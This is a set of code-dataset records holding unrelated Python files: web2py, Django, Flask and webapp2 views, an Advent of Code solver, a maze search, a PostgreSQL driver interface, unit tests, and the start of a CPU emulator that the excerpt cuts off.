#resultOption=False,\n #resultText= 'Exibindo {from} - {to} de {total} registros',\n #scroll=True,height=100,\n #searchText='Busque aqui',\n #sortName='name',\n #sortOrder='asc',\n #template='template',\n #templateStyle='blabla',\n\n\n\n ),\n )\n\n return dict(p=p)\n\n@auth.requires_login()\ndef presupuestos2():\n \n class Virtual(object):\n @virtualsettings(label=T('Informacion: '))\n def virtualtooltip(self):\n return T('se retiro para <strong>%s</strong>, en concepto de <strong>%s</strong><br>' %\n (self.cliente.empresa,self.movimientos.concepto))\n \n datasource = db(db.movimientos.cliente==db.cliente.id).select() \n powerTable = plugins.powerTable\n powerTable.datasource = datasource\n powerTable.virtualfields = Virtual()\n powerTable.headers = 'labels'\n powerTable.showkeycolumn = True\n powerTable.dtfeatures['bJQueryUI'] = request.vars.get('jqueryui',True)\n powerTable.uitheme = request.vars.get('theme','Smoothness')\n powerTable.dtfeatures['sScrollX'] = '100%'\n powerTable.dtfeatures['sPaginationType'] = request.vars.get('pager','scrolling')\n powerTable.extrajs = dict(autoresize={},\n tooltip={},\n )\n powerTable.columns = ['movimientos.id',\n 'movimientos.entregado_x',\n 'movimientos.retirado_x',\n 'movimientos.id_articulo',\n 'movimientos.cantidad',\n 'movimientos.Comprobante',\n 'movimientos.fecha_pedido',\n 'movimientos.fecha_devuelta'\n ]\n return dict(table=powerTable.create())\n\n@auth.requires(auth.has_membership(role='Admin')) \ndef movimientos():\n \n mystep = [dict(title='MOVIMIENTOS',Legend='Ingrese los datos solicitados',\n fields=['entregado_x','retirado_x','id_articulo','cantidad',\n 'estado','Comprobante',\n 'cliente','concepto'])]\n from plugin_PowerFormWizard import PowerFormWizard\n options = {'description':False,'legend':True,'validate':True}\n form = PowerFormWizard(db.movimientos, steps=mystep, options=options)\n \n if form.accepts(request.vars, session):\n response.flash = \"registro aceptado\"\n rows = db(db.movimientos.id>0).select()\n last_row = rows.last()\n a=db.memomovi.insert(referencia=last_row.id,entregado_x=last_row.entregado_x,\n retirado_x=last_row.retirado_x,id_articulo=last_row.id_articulo,\n cantidad=last_row.cantidad,fecha_pedido=last_row.fecha_pedido,\n fecha_devuelta=last_row.fecha_devuelta,estado=last_row.estado,\n Comprobante=last_row.Comprobante,cliente=last_row.cliente,\n concepto=last_row.concepto)\n #db.commit()\n elif form.errors:\n form.step_validation()\n response.flash = \"error en los datos\"\n return dict(form=form)\n\n","sub_path":"controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":12494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"122599383","text":"from pymongo.objectid import ObjectId\nfrom pymongo import DESCENDING, ASCENDING\n\nfrom gumshoe.core.utils import _db, _db_auth, _error\n\nimport time\n\nclass Activity():\n\n def __init__(self):\n self.db = _db()\n # all good\n True\n\n###########################\n# Private API methods\n###########################\n def user(self, user):\n db = _db_auth(self.db)\n\n if user:\n activities = db.activities.find({'_user_id':user['_id']}).sort('created_on',DESCENDING).limit(10)\n\n payload = {\n 'activity':self.parseActivities(activities)\n }\n payload['status'] = 'success'\n \n else:\n payload = _error('Could not find requested User')\n \n return payload\n \n###########################\n# Helpers\n###########################\n\n def parseActivities(self, activities):\n cleaned_activities = []\n db = _db_auth(self.db)\n \n for activity in activities:\n activity_obj = {\n 'created_on': int(time.mktime(activity['created_on'].timetuple())),\n 'action': activity['action']\n }\n \n # Completed mystery\n if activity['action'] == 'c_m':\n try:\n activity_obj['mystery_title'] = activity['mystery_title']\n activity_obj['user_mystery_id'] = str(activity['_user_mystery_id'])\n activity_obj['cash'] = activity['cash']\n activity_obj['points'] = activity['points']\n activity_obj['type'] = activity['mystery_type']\n except:\n user_mystery = db.user_mysteries.find_one(activity['_user_mystery_id'])\n try:\n activity_obj['mystery_title'] = user_mystery['title']\n activity_obj['user_mystery_id'] = str(user_mystery['_id'])\n activity_obj['cash'] = user_mystery['cash']\n activity_obj['pints'] = user_mystery['points']\n activity_obj['mystery_type'] = False\n # TODO - mystery type\n except:\n activity_obj = False\n\n # Started mystery\n elif activity['action'] == 's_m':\n try:\n activity_obj['mystery_title'] = activity['mystery_title']\n activity_obj['user_mystery_id'] = str(activity['_user_mystery_id'])\n activity_obj['type'] = activity['mystery_type']\n except:\n user_mystery = db.user_mysteries.find_one(activity['_user_mystery_id'])\n try:\n activity_obj['mystery_title'] = user_mystery['title']\n activity_obj['user_mystery_id'] = str(user_mystery['_id'])\n activity_obj['mystery_type'] = False\n # TODO - mystery type\n except:\n activity_obj = False\n\n # Earned award\n elif activity['action'] == 'e_a':\n #print activity\n try:\n activity_obj['mystery_title'] = activity['mystery_title']\n activity_obj['user_mystery_id'] = str(activity['_user_mystery_id'])\n activity_obj['_award_id'] = str(activity['_award_id'])\n activity_obj['award_id'] = activity['award_id']\n activity_obj['award_name'] = activity['award_name']\n activity_obj['award_text'] = activity['award_text']\n except:\n activity_obj = False\n\n\n \n else:\n activity_obj = False\n\n if activity_obj:\n cleaned_activities.append(activity_obj)\n \n return cleaned_activities","sub_path":"gumshoe/core/classes/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"336512899","text":"import re\n\n# this is so ugly it's embarrassing ;-)\n\ndef intersect(a1,a2,b1,b2):\n v = max(a1,b1)\n w = min(a2,b2)\n if v <= w:\n return (v, w)\n return None\n\ndef intersect3(x1,x2,y1,y2,z1,z2,x3,x4,y3,y4,z3,z4):\n u = intersect(x1,x2,x3,x4)\n v = intersect(y1,y2,y3,y4)\n w = intersect(z1,z2,z3,z4)\n if u and v and w:\n return u[0],u[1],v[0],v[1],w[0],w[1]\n return None\n\ndef vol(x1,x2,y1,y2,z1,z2):\n u = abs(x1-x2)+1\n v = abs(y1-y2)+1\n w = abs(z1-z2)+1\n return u*v*w\n\nr = re.compile(r\"(on|off) x=([-0-9]+)..([-0-9]+),y=([-0-9]+)..([-0-9]+),z=([-0-9]+)..([-0-9]+)\")\n\nwith open(\"input.txt\", mode=\"r\") as f:\n a = f.readlines()\n\nl = list(map(lambda m: (m.group(1)==\"on\", *[int(m.group(k)) for k in range(2, 8)]), [ r.match(x) for x in a ]))\n\non = []\noff = []\noncount = 0\n\nfor c in l:\n newon = []\n newoff = []\n if c[0]:\n # turn ON\n newon.append((c[1],c[2],c[3],c[4],c[5],c[6]))\n oncount += vol(c[1],c[2],c[3],c[4],c[5],c[6])\n for oc in on:\n i = intersect3(c[1],c[2],c[3],c[4],c[5],c[6], oc[0],oc[1],oc[2],oc[3],oc[4],oc[5])\n if i:\n oncount -= vol(i[0],i[1],i[2],i[3],i[4],i[5])\n newoff.append(i)\n for oc in off:\n i = intersect3(c[1],c[2],c[3],c[4],c[5],c[6], oc[0],oc[1],oc[2],oc[3],oc[4],oc[5])\n if i:\n oncount += vol(i[0],i[1],i[2],i[3],i[4],i[5])\n newon.append(i)\n on = on + newon\n off = off + newoff\n\nprint(oncount)\n","sub_path":"2021/22/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"589016521","text":"import argparse \ndef parse_args(): \n parser=argparse.ArgumentParser()\n parser.add_argument(\"--histograms\",nargs=\"+\")\n parser.add_argument(\"--categories\",nargs=\"+\") \n parser.add_argument(\"--outf\") \n return parser.parse_args() \ndef main():\n args=parse_args() \n outf=open(args.outf,'w') \n outf.write('Value'+'\\t'+'\\t'.join(args.categories)+'\\n')\n val_dict=dict() \n for index in range(len(args.histograms)): \n f=args.histograms[index] \n cur_category=args.categories[index] \n data=open(f,'r').read().strip().split('\\n') \n for line in data: \n tokens=line.split('\\t') \n cur_val=tokens[0] \n if cur_val not in val_dict: \n val_dict[cur_val]=dict() \n val_dict[cur_val][cur_category]=tokens[1] \n #write output file \n for cur_val in val_dict: \n outf.write(cur_val) \n for cur_category in args.categories: \n if cur_category in val_dict[cur_val]: \n outf.write('\\t'+val_dict[cur_val][cur_category])\n else: \n outf.write('\\t0') \n outf.write('\\n') \n \nif __name__==\"__main__\": \n main() \n\n","sub_path":"anna_code/datasets_paper/figure3/merge_metrics.py","file_name":"merge_metrics.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"259087886","text":"import string\n\n# 最小步数\n# minStep\n\ndef init():\n '''\n 深度优先算法\n 迷宫路径搜索\n '''\n print('输入迷宫,0表示空,1表示有障碍物,以空行结束')\n mazeArr=[]\n while True:\n line=input()\n if line=='':\n break\n else:\n mazeArr.append(line.split(\" \"))\n startCoord=input('请输入起始坐标:')\n startCoord=startCoord.split(\" \")\n targetCoord=input('请输入目标坐标:')\n targetCoord=targetCoord.split(\" \")\n print(startCoord)\n print(targetCoord)\n arrATOI(mazeArr)\n arrATOI(startCoord)\n arrATOI(targetCoord)\n print(mazeArr)\n global minStep\n minStep=len(mazeArr)*len(mazeArr[0])\n\n recordCoords = list(mazeArr)\n recordCoords=[[1,0,0],[0,0,0],[0,0,0]]\n # for i in len(recordCoords):\n # for j in len(recordCoords[i]):\n # recordCoords[i][j]=0\n # recordCoords[startCoord[0]][startCoord[1]]=1\n print(recordCoords)\n\n # recordCoords=[len(mazeArr)][len(mazeArr[0])]\n # recordCoords=[[]]*len(mazeArr)\n # for i in range(len(mazeArr)):\n # recordCoords[i]=[0]*len(mazeArr[0])\n # # for i in range(len(mazeArr)):\n # # # recordCoords[i]=[]\n # # for j in range(len(mazeArr[0])):\n # # recordCoords[i][j]=0\n # recordCoords[startCoord[0]][startCoord[1]]=1\n\n dfs(mazeArr,0,startCoord,targetCoord,recordCoords)\n print(\"最短的步数为:\")\n print(minStep)\n\n# 将字符串数组转化为数值型\ndef arrATOI(arr):\n for i in range(len(arr)):\n if isinstance(arr[i],list):\n arrATOI(arr[i])\n else:\n # arr[i]=string.atoi(arr[i])\n arr[i]=int(arr[i])\n\nnextStep=[[0,-1],[1,0],[0,1],[-1,0]]\n\n\ndef dfs(mazeArr,step ,startCoord,targetCoord,recordCoords,currentStep=0,currentCoord=-1):\n\n shangbian=0\n xiabian=len(mazeArr)-1\n zuobian=0\n youbian=len(mazeArr[0])-1\n if currentCoord == -1:\n currentCoord=[startCoord[0],startCoord[1]]\n\n print(currentCoord[0])\n print(currentCoord[1])\n print(currentStep)\n for i in range(4):\n if i == 0:\n # 上\n currentCoord[0]=startCoord[0]+nextStep[0][0]\n currentCoord[1]=startCoord[1]+nextStep[0][1]\n elif i == 1:\n # 右\n currentCoord[0]=startCoord[0]+nextStep[1][0]\n currentCoord[1]=startCoord[1]+nextStep[1][1]\n elif i == 2:\n # 下\n currentCoord[0]=startCoord[0]+nextStep[2][0]\n currentCoord[1]=startCoord[1]+nextStep[2][1]\n else:\n # 左\n currentCoord[0]=startCoord[0]+nextStep[3][0]\n currentCoord[1]=startCoord[1]+nextStep[3][1]\n\n # 先判断是否到达了目标位置\n if currentCoord[0]==targetCoord[0] and currentCoord[1]==targetCoord[1]:\n # 到达了目标位置\n currentStep+=1\n if currentStep<minStep:\n global minStep\n minStep=currentStep\n print(\"找到一个路径步数为\")\n print(currentStep)\n print(recordCoords)\n return\n else:\n if currentCoord[0]<zuobian or currentCoord[0]>youbian or currentCoord[1]<shangbian or currentCoord[1]>xiabian:\n # 超出范围了\n # dfs(mazeArr,0,currentCoord,targetCoord,currentStep,currentCoord)\n # return\n pass\n else:\n if recordCoords[currentCoord[0]][currentCoord[1]] == 0:\n if mazeArr[currentCoord[0]][currentCoord[1]] == 1:\n # 障碍物\n # dfs(mazeArr,0,currentCoord,targetCoord,currentStep,currentCoord)\n # return\n pass\n else:\n currentStep+=1\n recordCoords[currentCoord[0]][currentCoord[1]] = 1\n dfs(mazeArr,0,[currentCoord[0],currentCoord[1]],targetCoord,recordCoords,currentStep,[currentCoord[0],currentCoord[1]])\n recordCoords[currentCoord[0]][currentCoord[1]] = 0\n\n\n\n\ninit()\n","sub_path":"basic/python/dfs/dfs2.py","file_name":"dfs2.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"52073056","text":"from django.shortcuts import render_to_response, get_object_or_404\nfrom django.template import RequestContext\nfrom django.http import HttpResponse\nfrom django.db.models import Avg\nfrom comments.forms import BookmakerCommentForm\nfrom comments.models import BookmakerComments, BookmakerCommentLike\nfrom user_profile.models import UserProfile\nfrom models import BookmakerProfile, BookmakerRate\nfrom forms import BookmakerRateForm\n\n\ndef get_all_bookmakers(request):\n bookmakers = BookmakerProfile.objects.annotate(rate=Avg('bookmakerrate__value')).all().order_by(\n Avg('bookmakerrate__value').desc())\n for bookmaker in bookmakers:\n if bookmaker.rate is None:\n bookmaker.rate = '-'\n return render_to_response('all_bookmakers.html', {'bookmakers': bookmakers},\n context_instance=RequestContext(request))\n\n\ndef get_bookmaker(request, id):\n bookmaker = get_object_or_404(BookmakerProfile.objects.annotate(rate=Avg('bookmakerrate__value')), id=id)\n if bookmaker.rate is None:\n bookmaker.rate = '-'\n if request.POST:\n form = BookmakerCommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.user = UserProfile.objects.get(user_id=request.user.id)\n comment.bookmaker_id = bookmaker\n comment.save()\n return render_to_response('comment_template.html', {'comment': comment, 'type': 'bookmaker'},\n context_instance=RequestContext(request))\n else:\n return HttpResponse('', status=400)\n comments = BookmakerComments.objects.filter(bookmaker_id=bookmaker)\n form = BookmakerCommentForm()\n rate_form = BookmakerRateForm()\n return render_to_response('bookmaker_description.html',\n {'bookmaker': bookmaker, 'form': form, 'rate_form': rate_form,\n 'bookmaker_id': id, 'comments': comments, 'type': 'bookmaker'},\n context_instance=RequestContext(request))\n\n\ndef like_comment(request, comment_id, value):\n try:\n value = int(value)\n comment_id = int(comment_id)\n if value in [1, -1]:\n user = UserProfile.objects.get(user_id=request.user.id)\n like = BookmakerCommentLike.objects.filter(user=user, comment_id=comment_id)\n if not like:\n comment = BookmakerComments.objects.get(id=comment_id)\n like = BookmakerCommentLike.objects.create(user=user, comment_id=comment, value=value)\n like.save()\n comment.likes += value\n comment.save()\n return HttpResponse('', status=200)\n else:\n return HttpResponse('You can post only one like', status=400)\n else:\n return HttpResponse('You can post only one like', status=400)\n except ValueError:\n return HttpResponse('You can post only one like', status=400)\n\n\ndef rate_bookmaker(request, bookmaker_id):\n try:\n bookmaker_id = int(bookmaker_id)\n if request.POST:\n form = BookmakerRateForm(request.POST)\n if form.is_valid():\n user = UserProfile.objects.get(user_id=request.user.id)\n bookmaker = BookmakerProfile.objects.get(id=bookmaker_id)\n rate = BookmakerRate.objects.filter(user=user, bookmaker_id=bookmaker)\n if not rate:\n rate = form.save(commit=False)\n rate.user = user\n rate.bookmaker_id = bookmaker\n rate.save()\n return HttpResponse('Thank you for your vote', status=200)\n else:\n return HttpResponse('You already voting', status=400)\n else:\n return HttpResponse('Select correct value', status=400)\n except ValueError:\n return HttpResponse('Wrong bookmaker id', status=400)\n","sub_path":"bookmakers_profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"119959994","text":"import sys, os\nsys.path.insert(0, os.path.realpath(os.path.join(os.path.abspath(os.path.dirname(__file__)), '..')))\n\nimport json\n\nfrom flask import Flask, Response, request, render_template\n\nfrom stockviewer.view import viewmanager\nfrom stockviewer.utils import parse_config\n\nimport stockviewer.settings\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n\treturn render_template('index.html')\n\n@app.route('/view')\ndef view():\n\tsymbol = request.args.get('symbol')\n\tbegin = request.args.get('begin')\n\tend = request.args.get('end')\n\n\tconfig = parse_config(stockviewer.settings.files['config'])\n\n\tvm = viewmanager(config.find('viewmanager'))\n\tresponse = vm.view(symbol, begin, end)\n\n\treturn Response(json.dumps(response), mimetype='application/json')\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n","sub_path":"stockviewer/service/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"34452646","text":"import webapp2\nimport cgi\nfrom caesar import encrypt\n\n# Provide html for retrieving string and rotatation number from user\nform=\"\"\"\n<!DOCTYPE html>\n<html>\n<head>\n\t<title>Caesar\n \n\n\n
\n
\n \n
\n

Enter your text to Encrypt:

\n \n \n
\n\n\n\"\"\"\n\nclass MainHandler(webapp2.RequestHandler):\n\n def write_form(self, text_to_encrypt=\"\", rotate_number=\"\"):\n self.response.out.write(form % { \"text_to_encrypt\": text_to_encrypt,\n\t\t\t\t\t\t\t\t\t\t \"rotate_number\": rotate_number } )\n\n def get(self):\n self.write_form()\n\n def post(self):\n original_text = self.request.get(\"text_to_encrypt\")\n text_to_send = cgi.escape(original_text, quote=True)\n rotate_number = self.request.get(\"rotate_number\")\n #Call function to rotate text\n rotated_text = encrypt( text_to_send, int(rotate_number) )\n #Write back out the rotated text\n self.write_form( rotated_text, rotate_number )\n\napp = webapp2.WSGIApplication([('/', MainHandler)], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"226345149","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/mdipierro/make_web2py/web2py/gluon/contrib/pg8000/interface.py\n# Compiled at: 2013-10-14 11:16:24\n__author__ = 'Mathieu Fenniak'\nimport socket, protocol, threading\nfrom errors import *\n\ndef conninfo_parse(conninfo):\n \"\"\"Conninfo parser routine based on libpq conninfo_parse\"\"\"\n options = {}\n buf = conninfo + ' '\n tmp = pname = ''\n quoted_string = False\n cp = 0\n while cp < len(buf):\n c = buf[cp]\n if c.isspace() and tmp and not quoted_string and pname:\n options[pname] = tmp\n tmp = pname = ''\n elif c == \"'\":\n quoted_string = not quoted_string\n elif c == '\\\\':\n cp += 1\n tmp += buf[cp]\n elif c == '=':\n if not tmp:\n raise RuntimeError('missing parameter name (conninfo:%s)' % cp)\n pname = tmp\n tmp = ''\n elif not c.isspace() or quoted_string:\n tmp += c\n cp += 1\n\n if quoted_string:\n raise RuntimeError('unterminated quoted string (conninfo:%s)' % cp)\n return options\n\n\nclass DataIterator(object):\n\n def __init__(self, obj, func):\n self.obj = obj\n self.func = func\n\n def __iter__(self):\n return self\n\n def next(self):\n retval = self.func(self.obj)\n if retval == None:\n raise StopIteration()\n return retval\n\n\nstatement_number_lock = threading.Lock()\nstatement_number = 0\n\nclass PreparedStatement(object):\n row_cache_size = 100\n\n def __init__(self, connection, statement, *types, **kwargs):\n global statement_number\n if connection == None or connection.c == None:\n raise InterfaceError('connection not provided')\n try:\n statement_number_lock.acquire()\n self._statement_number = statement_number\n statement_number += 1\n finally:\n statement_number_lock.release()\n\n self.c = connection.c\n self._portal_name = None\n self._statement_name = kwargs.get('statement_name', 'pg8000_statement_%s' % self._statement_number)\n self._row_desc = None\n self._cached_rows = []\n self._ongoing_row_count = 0\n self._command_complete = True\n self._parse_row_desc = self.c.parse(self._statement_name, statement, types)\n self._lock = threading.RLock()\n return\n\n def close(self):\n if self._statement_name != '':\n self.c.close_statement(self._statement_name)\n if self._portal_name != None:\n self.c.close_portal(self._portal_name)\n self._portal_name = None\n return\n\n row_description = property(lambda self: self._getRowDescription())\n\n def _getRowDescription(self):\n if self._row_desc == None:\n return\n else:\n return self._row_desc.fields\n\n def execute(self, *args, **kwargs):\n self._lock.acquire()\n try:\n if not self._command_complete:\n self._cached_rows = []\n self._ongoing_row_count = 0\n if self._portal_name != None:\n self.c.close_portal(self._portal_name)\n self._command_complete = False\n self._portal_name = 'pg8000_portal_%s' % self._statement_number\n self._row_desc, cmd = self.c.bind(self._portal_name, self._statement_name, args, self._parse_row_desc, kwargs.get('stream'))\n if self._row_desc:\n self._fill_cache()\n else:\n self._command_complete = True\n self._ongoing_row_count = -1\n if cmd != None and cmd.rows != None:\n self._ongoing_row_count = cmd.rows\n finally:\n self._lock.release()\n\n return\n\n def _fill_cache(self):\n self._lock.acquire()\n try:\n if self._cached_rows:\n raise InternalError(\"attempt to fill cache that isn't empty\")\n end_of_data, rows = self.c.fetch_rows(self._portal_name, self.row_cache_size, self._row_desc)\n self._cached_rows = rows\n if end_of_data:\n self._command_complete = True\n finally:\n self._lock.release()\n\n def _fetch(self):\n if not self._row_desc:\n raise ProgrammingError('no result set')\n self._lock.acquire()\n try:\n if not self._cached_rows:\n if self._command_complete:\n return\n self._fill_cache()\n if self._command_complete and not self._cached_rows:\n return\n row = self._cached_rows.pop(0)\n self._ongoing_row_count += 1\n return tuple(row)\n finally:\n self._lock.release()\n\n return\n\n row_count = property(lambda self: self._get_row_count())\n\n def _get_row_count(self):\n self._lock.acquire()\n try:\n if not self._command_complete:\n end_of_data, rows = self.c.fetch_rows(self._portal_name, 0, self._row_desc)\n self._cached_rows += rows\n if end_of_data:\n self._command_complete = True\n else:\n raise InternalError('fetch_rows(0) did not hit end of data')\n return self._ongoing_row_count + len(self._cached_rows)\n finally:\n self._lock.release()\n\n def read_dict(self):\n row = self._fetch()\n if row == None:\n return row\n else:\n retval = {}\n for i in range(len(self._row_desc.fields)):\n col_name = self._row_desc.fields[i]['name']\n if retval.has_key(col_name):\n raise InterfaceError('cannot return dict of row when two columns have the same name (%r)' % (col_name,))\n retval[col_name] = row[i]\n\n return retval\n\n def read_tuple(self):\n return self._fetch()\n\n def iterate_tuple(self):\n return DataIterator(self, PreparedStatement.read_tuple)\n\n def iterate_dict(self):\n return DataIterator(self, PreparedStatement.read_dict)\n\n\nclass SimpleStatement(PreparedStatement):\n \"\"\"Internal wrapper to Simple Query protocol emulating a PreparedStatement\"\"\"\n row_cache_size = None\n\n def __init__(self, connection, statement):\n if connection == None or connection.c == None:\n raise InterfaceError('connection not provided')\n self.c = connection.c\n self._row_desc = None\n self._cached_rows = []\n self._ongoing_row_count = -1\n self._command_complete = True\n self.statement = statement\n self._lock = threading.RLock()\n return\n\n def close(self):\n pass\n\n def execute(self, *args, **kwargs):\n \"\"\"Run the SQL simple query stataments\"\"\"\n self._lock.acquire()\n try:\n self._row_desc, cmd_complete, self._cached_rows = self.c.send_simple_query(self.statement, kwargs.get('stream'))\n self._command_complete = True\n self._ongoing_row_count = -1\n if cmd_complete is not None and cmd_complete.rows is not None:\n self._ongoing_row_count = cmd_complete.rows\n finally:\n self._lock.release()\n\n return\n\n def _fill_cache(self):\n pass\n\n def _fetch(self):\n if not self._row_desc:\n raise ProgrammingError('no result set')\n self._lock.acquire()\n try:\n if not self._cached_rows:\n return\n else:\n row = self._cached_rows.pop(0)\n return tuple(row)\n\n finally:\n self._lock.release()\n\n return\n\n def _get_row_count(self):\n return self._ongoing_row_count\n\n\nclass Cursor(object):\n\n def __init__(self, connection):\n self.connection = connection\n self._stmt = None\n return\n\n def require_stmt(func):\n\n def retval(self, *args, **kwargs):\n if self._stmt == None:\n raise ProgrammingError('attempting to use unexecuted cursor')\n return func(self, *args, **kwargs)\n\n return retval\n\n row_description = property(lambda self: self._getRowDescription())\n\n def _getRowDescription(self):\n if self._stmt == None:\n return\n else:\n return self._stmt.row_description\n\n def execute(self, query, *args, **kwargs):\n if self.connection.is_closed:\n raise ConnectionClosedError()\n self.connection._unnamed_prepared_statement_lock.acquire()\n try:\n if kwargs.get('simple_query'):\n self._stmt = SimpleStatement(self.connection, query)\n else:\n self._stmt = PreparedStatement(self.connection, query, statement_name='', *[ {'type': type(x), 'value': x} for x in args ])\n self._stmt.execute(*args, **kwargs)\n finally:\n self.connection._unnamed_prepared_statement_lock.release()\n\n row_count = property(lambda self: self._get_row_count())\n\n @require_stmt\n def _get_row_count(self):\n return self._stmt.row_count\n\n @require_stmt\n def read_dict(self):\n return self._stmt.read_dict()\n\n @require_stmt\n def read_tuple(self):\n return self._stmt.read_tuple()\n\n @require_stmt\n def iterate_tuple(self):\n return self._stmt.iterate_tuple()\n\n @require_stmt\n def iterate_dict(self):\n return self._stmt.iterate_dict()\n\n def close(self):\n if self._stmt != None:\n self._stmt.close()\n self._stmt = None\n return\n\n def fileno(self):\n return self.connection.fileno()\n\n def isready(self):\n return self.connection.isready()\n\n\nclass Connection(Cursor):\n\n def __init__(self, dsn='', user=None, host=None, unix_sock=None, port=5432, database=None, password=None, socket_timeout=60, ssl=False):\n self._row_desc = None\n if dsn:\n opts = conninfo_parse(dsn)\n database = opts.get('dbname', database)\n user = opts.get('user', user)\n password = opts.get('password', user)\n host = opts.get('host', host)\n port = int(opts.get('port', port))\n ssl = opts.get('sslmode', 'disable') != 'disable'\n try:\n self.c = protocol.Connection(unix_sock=unix_sock, host=host, port=port, socket_timeout=socket_timeout, ssl=ssl)\n self.c.authenticate(user, password=password, database=database)\n except socket.error as e:\n raise InterfaceError('communication error', e)\n\n Cursor.__init__(self, self)\n self._begin = PreparedStatement(self, 'BEGIN TRANSACTION')\n self._commit = PreparedStatement(self, 'COMMIT TRANSACTION')\n self._rollback = PreparedStatement(self, 'ROLLBACK TRANSACTION')\n self._unnamed_prepared_statement_lock = threading.RLock()\n self.in_transaction = False\n self.autocommit = False\n return\n\n NotificationReceived = property(lambda self: getattr(self.c, 'NotificationReceived'), lambda self, value: setattr(self.c, 'NotificationReceived', value))\n NoticeReceived = property(lambda self: getattr(self.c, 'NoticeReceived'), lambda self, value: setattr(self.c, 'NoticeReceived', value))\n ParameterStatusReceived = property(lambda self: getattr(self.c, 'ParameterStatusReceived'), lambda self, value: setattr(self.c, 'ParameterStatusReceived', value))\n\n def begin(self):\n if self.is_closed:\n raise ConnectionClosedError()\n if self.autocommit:\n return\n self._begin.execute()\n self.in_transaction = True\n\n def commit(self):\n if self.is_closed:\n raise ConnectionClosedError()\n self._commit.execute()\n self.in_transaction = False\n\n def rollback(self):\n if self.is_closed:\n raise ConnectionClosedError()\n self._rollback.execute()\n self.in_transaction = False\n\n def close(self):\n if self.is_closed:\n raise ConnectionClosedError()\n self.c.close()\n self.c = None\n return\n\n is_closed = property(lambda self: self.c == None)\n\n def fileno(self):\n return self.c.fileno()\n\n def isready(self):\n return self.c.isready()\n\n def server_version(self):\n return self.c.server_version()\n\n def encoding(self, encoding=None):\n \"\"\"Returns the client_encoding as reported from the connected server\"\"\"\n return self.c.encoding()","sub_path":"pycfiles/lback-0.8.1/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":12657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"174594104","text":"#!/usr/bin/env python\nimport unittest\nfrom analyser_math import percentile\n\nclass test_percentile(unittest.TestCase):\n def test_1(self):\n data = [4, 4,\n 5, 5, 5, 5,\n 6, 6, 6,\n 7, 7, 7,\n 8, 8,\n 9, 9, 9,\n 10, 10, 10]\n p = 25\n self.assertAlmostEqual(5, percentile(p, data))\n \n \n def test_2(self):\n data = [4, 4,\n 5, 5, 5, 5,\n 6, 6, 6,\n 7, 7, 7,\n 8, 8,\n 9, 9, 9,\n 10, 10, 10]\n p = 85\n self.assertAlmostEqual(9.85, percentile(p, data))\n \n \n def test_3(self):\n data = [2, 3, 5, 9]\n p = 50\n self.assertAlmostEqual(4, percentile(p, data))\n\n \n def test_4(self):\n data = [2, 3, 5, 9, 11]\n p = 50\n self.assertAlmostEqual(5, percentile(p, data))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"math_unittest.py","file_name":"math_unittest.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"643902400","text":"#!/usr/bin/env python3\n#\n# The OCPU emulator\n\nimport sys\n\ntry:\n import pygame\nexcept ImportError:\n print(\"The OCPU emulator requires PyGame to be installed!\")\n exit()\n\ntry:\n import emu_utils\nexcept ImportError:\n raise ImportError(\"emu_utils.py does not appear to be present\")\n exit()\n\n\nclass Memory:\n def __init__(self, amount):\n self.data = [0x0000]*amount\n\n def read(self, hex_address):\n converted = int(hex_address)\n if converted > len(self.data):\n print(\"WARNING: Attempt to read from invalid address \" + str(hex_address))\n return 0\n\n return self.data[converted]\n\n def write(self, hex_address, hex_data):\n converted = int(hex_address)\n if converted > len(self.data):\n print(\"WARNING: Attempt to write to invalid address \" + str(hex_address))\n return 0\n\n self.data[converted] = hex_data\n\n\nclass Display:\n def __init__(self, vram_amount):\n pygame.init()\n\n self.dmem = Memory(vram_amount)\n\n dsize = emu_utils.display_size(vram_amount)\n self.dsize = self.width, self.height = dsize[0], dsize[1]\n\n self.screen = pygame.display.set_mode(self.dsize)\n\n def update(self):\n x, y, i = 0, 0, 0\n while y < self.height:\n while x < self.width:\n pygame.Surface.set_at(self,screen, x, y, emu_utils.color(self.dmem[i]))\n i += 1\n x += 1\n y += 1\n\n pygame.display.update()\n\n def clear(self):\n self.dmem = Memory(len(self.dmem))\n\n def set(self, hex_addr, hex_value):\n self.dmem.write(hex_addr, hex_value)\n\n\nclass Registers:\n def __init__(self, hex_ram_amount, hex_vram_amount, hex_rom_amount):\n self.data = [0x0000]*0x0D\n self.data[0x09] = hex_vram_amount\n self.data[0x0A] = hex_ram_amount\n self.data[0x0B] = hex_rom_amount\n\n def write(self, reg, data):\n if int(reg) < 9:\n self.data[int(reg)] = data\n else:\n print(\"WARNING: Attmept to write to locked register\", reg)\n\n def read(self, reg):\n return 